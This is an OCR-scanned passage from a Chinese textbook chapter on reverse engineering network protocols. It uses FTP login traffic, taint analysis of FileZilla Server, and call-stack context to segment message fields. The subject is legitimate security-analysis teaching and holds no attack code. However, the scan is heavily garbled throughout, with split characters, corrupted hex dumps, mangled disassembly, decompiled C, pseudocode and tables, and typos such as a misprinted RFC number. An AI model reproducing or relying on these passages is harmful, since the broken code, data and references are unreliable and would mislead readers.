域 的 重要 分 支 。 网 络 协议 逆向 的 主要 目标 是 获得 目标 软件 网 络 协议 的 消息 格式 以 及 通信 
方 消息 交互 的 状态 转换 自动 机 (后 文 简称 “状态 机 ”)。 协 议 的 消息 格式 就 是 协议 中 约定 的 
各 类 消息 的 组 成 机 制 , 而 状态 机 则 对 应 通信 各 方 依据 接收 到 的 消息 将 会 发 生 的 状态 变化 。 
比如 ,经 典 的 FTP 协议 (文件 传输 协议 外) 约定 了 两 个 拥有 IP 地 址 的 计算 节点 进行 文件 
共享 所 需要 的 消息 交互 规范 ,其 中 包括 了 节点 之 间 基 于 传输 层 协 议 ( 目 前 以 TCP 协议 为 
主 ) 如 何 构建 FTP 连接 ,如 何 基于 该 FTP 连接 发 送 文件 信息 和 进行 文件 传输 。 该 协议 以 
RFC 的 形式 由 互联 网 工程 任务 组 (IETF ) 发 布 , 即 RFC9599, RFC959 的 第 5 节 具 体 规 
ET FTP 协议 的 消息 格式 ,而 第 6 节 规定 了 FTP 协议 的 状态 转换 机 制 。 

网 络 协议 逆向 在 软件 安全 分 析 中 有 多 种 应 用 ,包括 : 

(1) 网 络 协议 的 模糊 测试 .安全 性 评估 等 。 

(2) 基于 流量 分 析 的 网 络 行为 特征 识别 、 网 络 人 侵 检测 等 。 

G) 网 络 的 主动 测量 、 网 络 服务 分 布 状况 探测 等 。 

本 章 讨论 的 网 络 协议 逆向 方法 是 前 文 介绍 的 软件 动态 分 析 方 法 的 具体 应 用 ,涉及 的 
程序 动态 分 析 方法 主要 包括 程序 执行 监控 ,污点 传播 .程序 切片 等 。 


10.2 协议 消息 格式 逆向 


消息 是 构成 网 络 协议 的 基本 要 素 之 一 ,网 络 协议 通信 双方 按照 协议 规范 通过 互相 发 
送 消息 来 实现 约定 的 功能 。 本 书 中 协议 北向 的 目标 之 一 是 : 逆向 得 到 的 协议 规范 能 够 满 
足 重 新 实现 该 协议 的 要 求 , 即 在 完成 协议 逆向 后 ,可 以 依据 逆向 结果 再 次 编程 实现 该 
协议 。 

网 络 协议 逆向 的 一 个 内 在 要 求 是 在 微观 层面 掌握 网 络 协议 细节 ,不 能 仅仅 停留 在 观 
察 某 次 消息 交互 后 通信 双方 的 状态 变化 ,还 必须 依据 协议 交互 中 实际 产生 的 消息 进行 格 
式 逆 向 。 例 如 ,在 登录 FTP 文件 服务 器 过 程 中 , 当 在 FTP 客户 端 输 入 用 户 名 和 密码 并 单 
击 登 录 按钮 后 ,会 立即 获得 用 户 登录 认证 的 结果 : 登录 成 功 或 者 失败 。 通 过 观察 用 户 登 
录 的 过 程 可 以 直接 从 中 推测 FTP 协议 规范 中 关于 登录 的 概要 信息 , 即 FTP 的 登录 过 程 
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是 典型 的 基于 用 户 名 和 密码 的 身份 认证 。 但 是 ,关于 协议 规范 的 细节 则 无 从 得 知 ,比如 用 
户 名 和 密码 是 以 怎样 的 形式 发 送 给 服务 器 的 .服务 器 在 验证 身份 后 发 回 的 响应 数据 包 是 
怎样 的 ,在 重新 实现 该 协议 时 必须 了 解 其 消息 的 基本 构成 。 

获取 并 分 析 网 络 协议 实现 所 产生 的 真实 的 流量 (网 络 流量 分 析 ) 是 协议 规范 逆向 的 重 
要 方法 之 一 ,也 是 目前 应 用 最 为 广泛 的 方法 ,能 够 迅速 便捷 地 提供 关于 协议 逆向 的 直接 线 
索 。 图 10-1 是 利用 Wireshark 对 FTP 协议 认证 登录 过 程 流量 的 分 析 , 该 流量 信息 已 将 
无 关 的 其 他 数据 包 过 滤 , 仅 展示 出 FTP 协议 的 相关 流量 ,其 中 IP 地 址 为 192. 168. 1. 185 
的 主机 为 FTP 服务 器 ,服务 器 软件 选用 开源 的 FileZilla; IP 地 址 为 172. 18. 144. 11 的 主 
机 为 FTP 客户 端 , 客 户 端 软 件 选用 Windows 操作 系统 自 带 的 资源 管理 器 ( 即 在 资源 管理 
器 的 地 址 栏 直接 输入 FTP 服务 器 地 址 ) 。 


Km RES WEAR nuum 
96 


goes anet m asne 
20192.168.1.185 172.18.144.11 FTP Service ready for new user ~ Filezilla server version 0.9.41 beta 


21 192.168.1. 118.144. 99 Service ready for new user written by Tim Kosse (Tim.Kosseagmx, de) 
23 192.168.1.185 172.18.144.11 FTP 115 Service ready for new user Please visit http://sourceforge. net/projects/f11ezi11a/ 
24 172.18.144,11 192.168.1.185 FTP 65USER test 
6 192.168. 1, .18.144.11 FTP — 86 User name okay, need password Password required for test 


27172.18.144.11 192.168.1.185 FTP — 65 PASS test 
69 user logged in, proceed Logged on 


29192.168.1.185 172.18.144.11 FTP 


图 10-1 FTP 协议 认证 登录 过 程 的 网 络 流量 


从 图 10-1 中 可 见 , Wireshark 软件 已 针对 该 流量 进行 了 初步 的 语义 标记 ,包括 通信 数 
据 包 的 源 IP 地 址 和 目的 地 址 、 数 据 包 长 度 和 数据 包 内 容 的 类 型 (请 求 Request 还 是 应 答 
Response), FTP 客户 端 和 服务 器 在 完成 TCP 连接 后 ,服务 器 会 直接 向 客户 端 发 送 关 于 
服务 器 的 信息 (服务 器 版 本 、 服 务 器 软件 开发 者 以 及 软件 项 目的 Web 网 址 等 ) ,对 应 图 中 
前 3 个 数据 包 。 当 用 户 在 客户 端 单 击 登录 按钮 后 ,客户 端 将 向 服务 器 端 发 送 内 容 为 
USER test 的 消息 ,服务 端 则 立即 回复 一 个 内 容 为 331 Password required for test 的 消 
息 , 客 户 端 继续 发 送 内 容 为 PASS test 的 消息 , 则 服务 器 端 获得 了 用 户 登 录 的 身份 信息 ， 
经 过 验证 后 返回 最 终 的 结果 , 即 内 容 为 230 Logged on 的 消息 ,此 时 客户 端 成 功 完 成 身份 
认证 ,可 以 与 服务 器 进一步 交互 ,如 图 10-2 所 示 。 由 此 可 见 ,通过 流量 数据 的 直观 展示 ， 
有 经 验 的 读者 似乎 已 经 能 够 很 直接 地 获取 目标 协议 的 规范 。 


尝试 登录 p] 站] 

用 户 USER 要 求 登录 
331 Password required fortest 发 送 密码 请 求 
用 户 名 被 接受 M si 

发 送 密码 

收 到 用 户 USER 的 密码 ， 密 码 正确 
hee 发 送 验证 成 功 消息 
登录 成 功 

















10-2 FTP 登录 过 程 


软件 安全 分 析 与 应 用 


由 上 可 见 ,借助 于 经 验 可 以 大 致 确定 USER, PASS 等 可 读 性 较 强 的 文本 字 词 和 容 
易 被 忽视 的 空格 等 具有 特殊 语义 的 关键 字段 (关键 字段 是 协议 设计 中 具有 特定 含义 的 字 
段 , 会 在 不 同 的 流量 记录 中 反复 出 现 ) ,而 这 些 单词 后 的 “test” 等 字符 串 则 是 对 应 的 用 户 
名 或 者 密码 ,这 些 字符 串 在 其 他 用 户 登录 过 程 中 是 有 可 能 不 出 现 的 。 

此 外 ,借助 类 似 Wireshark 的 协议 解析 工具 也 可 以 很 容易 获取 已 知 协议 数据 包 的 具 
体格 式 , 但 是 针对 未 知 格式 或 者 针对 另外 一 种 表达 形式 有 可 能 就 无 能 为 力 了 。 例 如 ,假设 
Wireshark 软件 不 支持 针对 FTP 协议 流量 的 解析 , 则 解析 结果 如 图 10-3 所 示 。 此 时 就 只 
能 得 到 IP 层 和 TCP 层 的 数据 包 信息 ,TCP 层 以 上 的 数据 是 完全 无 法 人 工 识别 的 二 进 制 
数据 。 当 然 ,有 的 读者 会 认为 ,如 果 将 二 进 制 数据 转换 为 ASCI 码 ,还 是 能 够 看 到 FTP 
协议 清晰 的 消息 字段 结构 。 这 里 ,笔者 要 提醒 读者 ,FTP 协议 是 文本 协议 ,而 现实 中 大 多 
数 网 络 程序 使 用 的 通信 协议 早已 采用 了 宛 余 性 更 小 .通信 效率 更 高 .相对 安全 性 也 更 好 的 
二 进 制 数据 格式 。 针 对 这 些 网 络 协议 的 消息 数据 格式 ,很 难 直接 找到 字段 分 隔 的 边界 。 
e AA2323020466968554896c6c81205385727585722076857273696r6620302£39252431206: 

115 0132323020306 65617365207669735974206874747032F 2:736: 75726305666: 726765206 


65 0x555345522074657374000A 
86 0x3333312050617373776F7264207265717 56972656420666F722074657 374000A 


BS 时间 源 地 址 目的 地 址 
20 4.153493 192.168.1.185 
21 4.153607 192.168.1.185 
23 4.153877 192.168.1.185 
24 4.153961 172.18.144.11 





26 4.155993 192. z 
27 4.156063 172.18.144.11 192.168.1.185 FTP 65 0x5041535320746573740DOA 
294.157621 192.168.1.185 172.18.144.11 FTP 69 0x323330204C6F67676564206F6E0D0A 


图 10-3 数据 包 内 容 未 解析 的 FTP 登录 流量 


单纯 基于 网 络 流量 分 析 的 协议 逆向 方法 不 是 本 书 的 重点 ,读者 可 从 其 他 资料 获取 进 
一 步 的 详细 信息 ,在 本 章 中 仅 将 其 作为 辅助 了 解 协议 逆向 原理 的 基本 工具 和 手段 。 

本 章 重点 介绍 基于 软件 分 析 的 协议 逆向 分 析 方 法 。 协 议 消息 格式 的 逆向 分 为 3 个 阶 
段 , 分 别 是 字段 划分 .字段 间 关 系 识 别 和 字段 功能 语义 恢复 。 由 程序 编译 的 基本 原理 可 
知 ,编译 器 编译 时 扫描 字符 流 以 提取 单词 符号 、 构 建 语法 树 以 及 基于 语义 的 指令 翻译 的 过 
程 同 协议 逆向 的 过 程 相似 ,因此 也 可 以 将 协议 消息 格式 逆向 的 3 个 阶段 称 作词 法 分 析 \ 语 
法 分 析 和 语义 分 析 。 


1021 字段 划分 


协议 中 的 消息 由 字段 构成 ,字段 是 指 具有 独立 功能 含义 的 单词 ,字段 划分 就 是 将 完整 
的 一 条 消息 转换 为 字段 构成 的 序列 的 过 程 , 因 此 字段 划分 是 理解 消息 的 第 一 步 。 前 面 已 
经 看 到 ,只 要 掌握 了 基础 的 计算 机 知识 和 网 络 知识 ,就 可 以 比较 容易 地 针对 FTP 消息 进 
行 字段 划分 。 现 在 梳理 一 下 前 面 实施 字段 划分 所 依赖 的 潜在 知识 。 这 里 ,首先 使 用 
Wireshark 等 软件 实施 流量 截获 ,得 到 一 条 由 二 进 制 数字 构成 的 消息 ,其 中 我 们 依赖 的 一 
个 潜在 知识 是 : 数据 表现 形式 的 优化 可 以 改善 分 析 人 员 对 数据 的 理解 。 即 ,虽然 二 进 制 
数字 是 计算 机 最 熟悉 的 数据 形式 ,但 是 人 们 显然 希望 更 清晰 简洁 的 数据 表达 。 因 此 ,首先 
将 二 进 制 数字 转换 为 更 短小 精干 的 十 六 进 制 数字 。 可 以 看 到 ,图 10-4 中 的 十 六 进 制 是 按 
照 两 个 字符 为 一 组 分 割 的 ,这 是 因为 两 个 十 六 进 制 数字 字符 代表 一 个 字 节 , 字 节 是 计算 机 
内 存 处 理 数据 的 基本 单元 。 如 果 更 进一步 将 十 六 进 制 转换 为 ASCII 码 ,这 时 消息 变 成 了 
清晰 的 英文 字符 串 ,按照 一 般 情况 可 以 认为 该 消息 由 ASCII 码 可 读 字 符 编 码 而 成 。 同 时 
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依据 一 般 经 验 ,读者 可 以 依据 英语 单词 的 构 词 方式 将 该 字符 串 划 分 为 4 部 分 , 即 
"USER" 空格 字符 “test? 和 "*\r\vn?”。 实 现 上 述 字段 划分 所 依据 的 潜在 经 验 知识 是 
ASCII 码 的 构成 规则 、 英 文 单词 的 识别 。 本 节 将 介绍 的 方法 不 依赖 于 上 述 人 工 经 验 , 仅 仅 
由 计算 机 依据 二 进 制 指令 处 理 特征 进行 扫描 识别 ,和 人 工 识别 一 样 完成 字段 划分 。 


二 进 制 1010101010100110100010101010010001000000111 
0100011001010111001111101000000110100001010 










































































十 六 进 制 55 53 45 52 20 74 65 73 74 0D 0A 

asena 00 ustetan 0000000 i 
字符 分 隔 u j| s || EJ R tjejs]t]viw 

字段 分 隔 UJS|E]|R t| ejl s]|t Ww 







































































图 10-4 USER 消息 的 字段 划分 过 程 


1. 基于 分 隔 符 的 划分 方法 

基于 分 隔 符 的 划分 方法 是 一 种 利用 消息 中 的 分 隔 符 等 特殊 字段 进行 字段 切 分 的 一 种 
方法 ,目标 协议 消息 通过 分 隔 符 来 划分 字段 边界 时 才能 使 用 该 方法 。 该 方法 首先 由 
Dawn Song 团队 中 和 Christopher Kruegel 团队 四 提出 并 应 用 于 协议 逆向 分 析 。 目 前 已 
知 的 大 多 数 基 于 ASCI 文本 的 协议 通常 都 可 以 用 这 种 方法 来 进行 字段 划分 ,比如 HTTP 
协议 .FTP 协议 .SMTP 协议 .POP3 协议 .DNS 协议 等 。 

程序 动态 分 析 能 够 细 粒 度 地 追踪 程序 执行 的 过 程 ,获取 的 信息 包括 每 一 条 执行 的 指令 
以 及 该 指令 执行 前 后 系统 的 状态 (包括 CPU 各 寄存 器 的 值 , 各 个 内 存 区 域 存储 的 数据 等 ) 。 
基于 软件 动态 分 析 区 分 普通 字符 和 分 隔 符 .需要 找到 这 两 类 字符 在 程序 处 理 逻 辑 中 的 差异 。 
首先 观察 一 下 已 知 分 隔 符 在 程序 处 理 流程 中 的 行为 特点 ,以 一 款 开 源 FTP 软件 FileZilla 
Server 0. 9. 43 为 例 ,从 源 代码 ,汇编 指令 等 两 个 方面 来 介绍 ,如 图 10-5、 图 10-6 所 示 。 











246: //Split command and arguments 
247: intpos-str2 Find( T("")) 

248: if(pos!--1) 

249: ( 

250: command = str2 Left(pos); 
251: if (pos == str2.GetLength() -1) 
252: args= T(""); 

253: else 

254: { 

255: args = str2.Mid(pos + 1); 
256: if(args== T("")) 

257: { 

258: Send( T("501 Syntax error, failed to decode string")); 
259: return FALSE; 

260: } 

261: } 

262: } 





图 10-5 协议 实现 中 分 隔 符 相关 的 源 代码 (摘自 Controlsocket. cpp) 
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9 
offset unk 57C160 
ecx, [espe80hevar 48] 
sub 503059 
mou edi, eax 
or eax, OFFFFFFFFh 
cnp edi, eax 
cnovz edi, eax 
cap edi, eax 
jz loc hh6B3F 
loc h^6B3F: ; CODE 
mou edx, offset unk 58232C 
mou ecx, ebp 
call sub ^05030 
mou edx, [esi+14h] 
cnp edx, 8 
jb short loc hh6B57 
mou ecx, [esi] 
jnp Short loc hh6B59 





v16 -[sub »03080(Cint)&o35, Cint)&unk »7C160,| 
it ( vb aen 
H 
Sub 505030(33, &unk 82320); 
v25 = «( DWORD «)(a2 + 20); 
if ( v25 < 8 ) 
v22 = (int x)a2; 
else 
v22 = «(int ««)a2; 
v26 = &v3h; 
if ( v36 >= 8 ) 
v26 = (int «)u35; 
if ( v22 t= v26 ) 
H 


*( DUORD «)(a2 + 16) = 0; 
if ( v25 € 8) 
v27 = a2; 
else 
v27 = #(_DWORD *)a2; 
*( WORD «)u27 = 0; 
loc ^028B0(32, &34, 0, -1); 


》 
goto LABEL 60; 
H 








图 10-6 协议 实现 中 分 隔 符 相关 的 汇编 指令 


从 源 代码 可 以 看 出 ,程序 通过 CString 类 的 Find 函数 将 接收 到 的 网 络 数据 中 的 每 一 
个 字 节 与 空格 分 隔 符 进行 比较 ,那么 提取 出 分 隔 符 的 方法 就 比较 显然 了 ,可 以 直接 通过 理 
解 程序 语义 找到 str2. Find(_T("")) 这 样 的 语句 来 定位 分 隔 符 。 但 是 我 们 面 对 的 是 静态 
反 汇 编 代 码 ,找到 这 样 语句 就 比较 困难 了 。 尤 其 是 当 不 存在 调试 符号 可 以 参考 时 ,必须 深 
入 研究 CString 类 的 Find 函数 汇编 指令 ,图 10-6 中 方 框 所 示 即 为 CString 类 的 Find 函 
数 ( 右 侧 ) 和 其 调用 点 ( 左 侧 ) 的 汇编 指令 。 该 函数 代码 未 开源 ,其 反 编 译 C 代码 和 汇编 代 


码 的 部 分 片段 如 图 10-7 所 示 。 





if ( a3 > *( DWORD «)(this + 16) ) 
€ 


v5 = «( DUORD «)(this + 16); 
if ( (unsigned int)a3 < v5 ) 
€ 


v6 = v5 - a3; 
if ( HIDWORD(a3) <= vó ) 
€ 


v7 = 4 - MIDWORD(a3) + vó; 
v16 = *«( DUORD =)(this + 20); 
if (916 « 8 ) 

v8 = this; 
else 


i2) 





for(i-v8*2* 3; ; 
H 

u17 = i; 

if (v7) 

n 


v10 -Luzz 
whilef ( *( VORD *)i ?= *( WORD *)a2 ) 
€ 


i +e 2; 
一-u193 
if ( fu10 ) 


goto LABEL 13; 








lea eax, [eax+edx=2] 
; CODE XREF: sub ^ 

mou dword ptr [espei8hearg Ae4], eax 

test ebx, ebx 

jz Short loc ^0308B 

mov edx, [espeiSh*arg 0] 

nou ecx, ebx 

novzx edx, word ptr [edx] 

lea esp, [esp*6] 
; CODE XREF: sub à 

Ede 

z Short Toc h0308D 

add eax, 2 

dec ecx 

jnz short loc 403080 








图 10-7 CString 类 的 Find 函数 部 分 反 汇 编 代 码 片段 
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针对 海量 汇编 指令 ,自动 识别 分 隔 符 的 算法 会 极 大 地 减轻 人 工分 析 的 工作 量 。 而 要 
实现 程序 自动 识别 ,必须 把 抽象 理解 的 语义 转换 成 微观 的 指令 执行 特征 ,并 且 这 些 特征 能 
够 对 分 隔 字符 和 非 分 隔 字符 有 较 好 的 区 分 度 。 

如 果 仔 细 分 析 图 10-7 中 左 侧 方 框 所 标注 的 代码 及 其 执行 上 下 文 , 就 会 发 现 可 能 的 解 
决 方案 。 这 条 语句 使 用 了 “*!= ”符号 ,是 比较 语句 ,而 a2 是 CString Find 函数 的 第 二 个 指 
针 参 数 (由 a2 的 变量 定义 来 源 可 知 ) ,指向 一 个 固定 的 常量 字符 ,而 i 是 从 网 络 接收 的 数 
据 。 此 外 还 会 注意 到 ,除了 指令 本 身 ,包含 该 指令 的 循环 也 比较 关键 , 即 i 要 能 够 遍历 一 
段 网 络 消息 缓冲 区 。 聪 明 的 读者 马上 会 想到 这 里 正好 可 以 利用 程序 污点 传播 分 析 技 术 来 
筛选 出 这 样 的 指令 。 首 先 , 污 点 传播 能 够 帮助 我 们 从 大 量 指令 中 筛选 出 被 网 络 接收 的 数 
据 所 污染 的 指令 , 即 处 理 接收 消息 的 指令 .关联 的 寄存 器 和 内 存 区 域 , 也 就 是 筛选 出 涉及 
的 指令 。 其 次 ,可 以 从 这 些 指 令 中 进一步 筛选 出 比较 指令 (对 于 分 隔 符 来 说 ,比较 指令 是 
"17 ,以 及 除 污点 操作 数 以 外 ,另外 一 个 操作 数 是 常量 的 指令 (如 cmp al, 0xD)。 那 么 
如 果 某 个 单字 符 常 量 与 消息 的 所 有 字 节 都 逐个 比较 过 , 即 如 果 被 污染 的 比较 指令 的 操作 
数 中 某 个 单字 节 常 量 出 现 了 多 次 ,那么 该 常量 字符 很 可 能 就 是 该 消息 的 分 隔 符 。 

单字 符 分 隔 符 的 识别 方法 是 获取 目标 程序 接收 网 络 消息 及 其 处 理 全 过 程 的 离线 记录 
(CTrace) ,在 离线 记录 中 进行 污点 传播 ,其 中 网 络 接收 到 的 消息 标记 为 污点 源 , 从 污点 传播 
完成 得 到 的 指令 记录 中 筛选 出 所 有 操作 数 之 一 为 单字 节 常 数 的 CMP 比较 指令 (如 emp 
bl, 0xA, 基 于 x86 汇编 指令 的 比较 操作 符 不 限于 CMP, 常 用 的 还 有 TEST) ,同时 为 所 有 
可 能 的 单字 节 常 数 按照 出 现 次 数 进行 计数 。 若 某 个 常数 与 连续 的 多 个 (二 2) 字 节 进 行 比 
较 , 则 该 常数 是 可 能 的 分 隔 符 , 该 方法 用 算法 伪 代 码 表示 如 下 : 

算法 ”基于 单字 符 分 隔 符 的 字段 划分 

输入 :污点 来 源 标签 集合 了 ,分 别 对 应 接收 消息 的 各 个 字 节 

常数 字符 串 c (通常 定义 为 8b (单字 节 ) 的 取 值 域 , 即 0~ 255) 

污点 传播 记录 序列 (以 接收 消息 为 污点 源 ,传播 规则 为 数据 依赖 关系 )Tlist 

输出 :疑似 分 隔 符 集合 s 

Begin 

Define TaintMap- {},C (m|nC 7), 单字 节 字 符 到 污点 来 源 标签 集合 的 子 集 的 映射 
For t in Tlist: 
If Type(t) is 比较 指令 : 
提取 操作 数 op a SES op b 
If op_aETAop bEc 
TaintMap[op b]- TaintMap[op b]U top a! 
Else if op aC CA op bET 
TaintMap[op a]- TeintMap[op a]U (cp b} 
End For 





For c, c list in TaintMap: 
Ifc list.size() «2: 
continue 
S-SU tc) 
End For 
End 
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下 面 以 某 FTP 服务 器 程序 接收 到 客户 端 发 送 的 认证 请 求 消息 为 例 进一步 阐述 该 方 
ik. FTP 协议 中 用 户 认证 请 求 均 为 明文 (如 图 10-2 所 示 ) ,下 面 的 示例 所 分 析 的 输入 消息 
为 "USER test\rn\n”, 其 中 USER 为 关键 字 , 是 协议 规范 中 约定 的 ,不 随 协议 实现 而 改变 ， 
test 为 管理 员 配 置 许可 的 用 户 名 ,在 USER 和 test 之 间 有 一 个 空格 字符 ,同时 在 test 后 
面 还 有 换行 和 回 车 两 个 字符 。 通 过 FTP 协议 规范 对 于 消息 格式 的 约定 能 马上 获悉 空格 
字符 、 回 车 和 换行 字符 为 分 隔 符 。 

为 了 对 比 不 同 FTP 协议 实现 在 处 理 消 息 时 对 分 隔 符 的 处 理 ,本 书 给 出 针对 两 种 
FTP 服务 器 程序 的 分 析 结 果 , 如 表 10-1 和 表 10-2 所 示 , 分 别 为 精简 FTP 服务 器 程序 和 
功能 全 面 而 复杂 的 FileZilla 服务 器 程序 (版 本 为 0.9.41)。 表 10-1 和 表 10-2 给 出 了 不 同 
的 污点 标签 与 常数 比较 的 记录 , 表 项 中 数值 为 1 表示 对 应 的 污点 标签 与 分 隔 常 数 之 间 有 
比较 操作 ,数值 为 0 表示 没有 比较 过 ,其 中 分 隔 常数 的 数值 前 带 * 号 表示 该 常数 对 应 的 字 
符 同 时 也 是 污点 标签 , 即 包含 在 输入 消息 中 。 


表 10-1 针对 精简 FTP 服务 器 程序 的 字符 比较 记录 
























































污点 标签 
分 隔 常 数 
v|s|wxw|m|*"pjxgwiow NO NY 
0x0 1 1 1 1 1 1 1 1 1 1 1 
0x4 1 1 1 1 0 0 0 0 0 0 0 
* 0x20 1 1 1 1 1 0 0 0 0 0 0 
OxA 1 1 1 1 1 1 1 1 1 1 1 
0xD 1 1 1 1 1 1 1 1 0 
表 10-2 针对 FileZilla 服务 器 程序 的 字符 比较 记录 
污点 标签 
分 隔 常 数 
UE AE SE JE. 中 | ej s o| dd Aw 
0x0 1 1 1 1 1 1 1 0 1 
0x9 0 0 0 0 0 1 1 1 1 0 0 
* OxA 1 1 1 1 1 1 1 1 0 1 
* OxD 1 1 1 1 1 1 1 1 1 1 1 
0x16 1 1 1 1 0 i 1 1 1 0 0 
* 0x20 1 1 1 1 1 1 1 1 1 0 0 
OxFF 1 1 1 1 1 1 1 1 1 0 0 
0x55 1 0 0 0 0 0 0 0 0 0 0 
0x53 1 0 0 0 0 0 0 0 0 0 
0x45 1 1 1 0 0 0 0 0 0 0 0 
0x52 1 1 1 1 0 0 0 0 0 0 0 
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若 分 隔 符 为 多 个 字 节 ( 如 双 字 节 ), 则 需要 考虑 两 种 情况 。 若 两 个 分 隔 符 出 现 的 次 数 
相同 , 且 两 个 分 隔 符 总 是 在 消息 中 相 邻 的 位 置 出 现 , 则 将 这 两 个 分 隔 符合 并 为 一 个 分 隔 
符 。 若 分 隔 符 是 基于 双 字 节 比 较 操作 符 的 , 则 还 需要 使 用 前 述 的 方法 以 两 字 节 为 粒度 进 
行 一 次 查找 ,从 而 能 够 直接 定位 双 字 节 分 隔 符 。 

基于 分 隔 符 的 识别 方法 只 能 对 文本 协议 进行 字段 划分 ,有 比较 大 的 局 限 性 。 

2. 基于 消息 处 理 指令 上 下 文 差异 的 划分 方法 

基于 消息 处 理 指令 上 下 文 差异 的 字段 划分 方法 依据 消息 中 每 个 字 节 相关 指令 不 同 的 
执行 上 下 文 来 区 分 字段 ,该 方法 摆脱 了 识别 过 程 中 对 字段 分 隔 符 的 依赖 。 这 里 指令 执行 
上 下 文 是 指 执行 过 程 中 除 指令 本 身 外 周围 执行 环境 的 状态 ,包括 目标 软件 ,操作 系统 甚至 
系统 硬件 (CPU 各 个 寄存 器 、 内 存 等 ) 的 状态 。 由 于 执行 上 下 文 赛 括 的 信息 过 多 ,如 果 字 
段 划 分 时 将 其 全 部 纳入 考虑 范畴 ,虽然 足够 把 字段 区 分 开 来 ,但 是 同时 也 发 现 消息 的 每 个 
字 节 都 会 存在 差异 ,导致 本 来 是 在 同一 字段 内 的 字 节 也 做 了 错误 的 划分 , 即 划 分 过 度 。 因 
此 执行 上 下 文 的 选择 对 于 该 方法 至 关 重要 。 

从 消息 本 身 看 ,字段 划分 是 指 将 消息 包含 的 字 节 分 块 ;而 从 消息 包含 的 字 节 来 看 , 字 
段 划 分 是 不 同 字 节 之 间 因 为 某 种 关系 可 以 关联 并 聚合 成 块 。 指 令 上 下 文 提供 的 信息 ,如 
果 有 助 于 不 同 字 节 之 间 的 关联 合并 就 应 当 采 用 。 表 10-3 简单 罗列 了 指令 执行 时 刻 所 能 
提供 的 状态 信息 。 

表 10-3 指令 上 下 文 信息 














系统 状态 信息 项 H x 区 分 HR 
指令 EIP 指令 执行 时 在 内 存 中 的 位 置 ,指令 本 身 高 
各 寄存 器 的 值 EAX,ECX,EDX 等 寄存 器 的 值 低 
内 存 值 系统 内 存 低 
最 后 一 次 call/jmp 的 地 址 当前 指令 执行 前 最 后 一 次 控制 转移 时 的 地 址 中 








指令 EIP 是 当前 时 刻 系统 内 存 地 址 中 执行 指令 的 地 址 , 它 唯一 确定 了 一 条 执行 的 指 
令 ,指令 本 身 包含 的 操作 数 的 内 容 是 动态 运行 才能 确定 的 , 若 该 操作 数 与 多 个 污点 数据 相 
关 , 则 表明 与 该 指令 相关 的 多 个 污点 数据 互相 之 间 高 度 相关 。 比 如 MOV EAX, [ESI]. 
车 ESI 的 值 作为 地 址 指向 的 内 存 区 域 包含 的 4 个 字 节 均 为 污点 数据 , 则 这 4 个 被 污点 标 
记 的 数据 所 对 应 的 4 个 污点 源 之 间 高 度 相关 ,通常 这 4 个 污点 源 还 同时 是 连续 的 字 节 , 显 
然 可 以 归并 到 同一 个 字段 。 

寄存 器 和 内 存 值 是 程序 运行 必 不 可 少 的 中 间 数 据 临 时 存储 区 域 。 寄 存 器 使 用 过 于 频 
繁 , 其 数值 动态 变化 频率 高 且 难 以 预测 和 利用 ,而 内 存 中 的 数据 也 由 于 其 分 配 地 址 随机 性 
较 强 ,利用 难度 也 较 高 。 因 此 ,难以 基于 寄存 器 和 内 存 数据 进行 污点 数据 的 关联 。 

最 后 一 次 call 或 者 jmp 的 地 址 是 指 最 近 的 一 次 call 或 者 jmp 指令 (能 够 产生 控制 流 
转移 ) 的 地 址 ,同时 也 可 以 理解 为 当前 指令 所 在 基本 块 的 前 一 个 基本 块 的 最 后 一 条 指令 的 
地 址 。 由 前 文 可 知 该 地 址 被 包含 在 调用 栈 中 ,调用 栈 同 指令 EIP 大 致 反映 了 当前 指令 所 
在 代码 块 的 上 下 文 ,而 针对 一 个 代码 块 , 调 用 栈 比 较 稳 定 , 可 以 作为 污点 数据 关联 的 依据 。 
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下 面 介绍 基于 执行 指令 调用 栈 的 字段 分 隔 方法 ,该 方法 首先 由 Dongyan Xu Bl AC! 
提出 。 该 方法 的 执行 上 下 文 信息 是 指 执行 指令 的 地 址 以 及 程序 调用 栈 信息 。 调 用 栈 是 一 
种 栈 数据 结构 ,程序 执行 中 调用 函数 时 会 将 函数 的 返回 地 址 压 和 人 栈 中 ,因此 从 栈 底 到 栈 顶 
分 别 是 正在 执行 的 各 级 函数 的 返回 地 址 。 例 如 ,图 10-8 为 FileZilla 服务 器 在 接收 到 消息 
USER test 时 的 函数 调用 栈 。 


调用 堆栈 
名 称 

© FileZilla Server.exe!CControlSocket:ParseCommand() £7 531 
FileZilla Server.exelCControlSocket:OnReceive(int nErrorCode) £7 216 
FileZilla Server.exeCAsyncSocketExHelperWindow:WindowProc(HWND .. hWnd, unsigned int message, unsigned int wParam, long IParam) (7 357 
user32.dIl InternalCalWinProcQ2200 
user32.dll! UserCallWinProcCheckWow360 
user32 dll! DispatchMessageWorkerG8() 
user32.dIll_DispatchMessageW@40 
FileZilla ServerexelCThread:Run0 行 94 
FileZilla Server.exe!CThread::ThreadProc(void * IpParameter) £7 81 
kernel32 dlllO BaseThreadlnitThunkQ 120 
ntdll.dll__RtlUserThreadStart@80 
ntdlLdll_RtiUserThreadStat@80 


图 10-8 FileZilla 服务 器 接收 用 户 认证 要 求 的 调用 栈 


大 多 数 协议 的 程序 实现 中 ,不 同 字段 在 程序 执行 时 的 调用 栈 是 不 同 的 。 图 10-9 为 
OpenSSL 协议 库 的 某 个 代码 片段 ,其 中 红色 标记 的 部 分 为 同一 个 消息 不 同 的 字段 。 显 
然 ,该 消息 中 不 同 字段 的 指令 地 址 是 不 同 的 ,基于 指令 地 址 可 以 快速 区 分 不 同 字段 。 该 消 
息 的 其 他 字段 在 其 他 函数 中 使 用 ,因而 能 够 通过 调用 栈 区 分 这 两 部 分 指令 。 





1085: n-recvmsg(b-»num. &msg. 0); 

1086: if(msg.msg controllen^ 0)( 

1087: for (cmsg= CMSG, FIRSTHDR(&msg); cmsg; cmsg = CMSG. NXTHDR(&msg, cmsg)) ( 
1088: if(cmsg-»cmsg level'- IPPROTO SCTP) 

1089: continue; 

1090: if(emsg-^cmsg type-- SCTP. RCVINFO) 

1091: { 

1092: structsctp rcvinfo *revinfo; 

1093: rcvinfo = (structsctp rcvinfo )CMSG DATA(emsg): 

1094: data-»rcvinfo.rcv sid = rcvinfo-»rcv sid: 











图 10-9 OpenSSL 消息 处 理 代码 片段 (摘自 bss_dgram. c) 


由 上 可 知 ,需要 动态 追踪 每 条 处 理 输入 消息 的 程序 指令 的 调用 栈 , 那 只 有 通过 污点 传 
播 技术 提取 “处 理 从 网 络 输入 消息 的 指令 ”( 标 记 输入 消息 为 污点 ,提取 污点 传播 过 程 中 所 
